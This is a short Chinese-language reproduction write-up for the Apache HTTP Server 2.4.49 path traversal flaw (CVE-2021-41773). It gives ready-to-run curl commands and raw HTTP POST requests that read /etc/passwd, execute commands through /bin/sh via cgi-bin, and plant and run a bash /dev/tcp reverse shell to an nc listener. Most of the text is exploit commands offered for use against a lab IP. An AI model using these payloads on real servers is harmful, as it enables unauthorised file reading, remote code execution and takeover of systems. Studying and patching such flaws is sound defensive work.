0x01 漏洞描述
在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。早期版本中并没有 ap_normalize_path 这个函数,该函数是在v2.4.49版本中引入的,正是这个函数导致了 目录穿越。
0x02 影响版本
Apache HTTP Server 2.4.49
0x03 漏洞环境
https://github.com/blasty/CVE-2021-41773
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013
https://github.com/1nhann/CVE-2021-41773
0x04 漏洞复现
1.读取文件
curl -s --path-as-is "http://10.108.0.90:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
2.执行命令
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://10.108.0.90:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
3.反弹shell
在服务器上使用nc监听
nc -lvvp 9998
在服务器中写入反弹shell命令
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 10.108.0.90:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
Connection: close
data=;echo "bash -i >& /dev/tcp/10.108.0.90/9998 0>&1">> /tmp/xxx.sh
执行脚本
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 10.108.0.90:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close
echo Content-Type: text/plain; echo; bash /tmp/xxx.sh
成功反弹shell
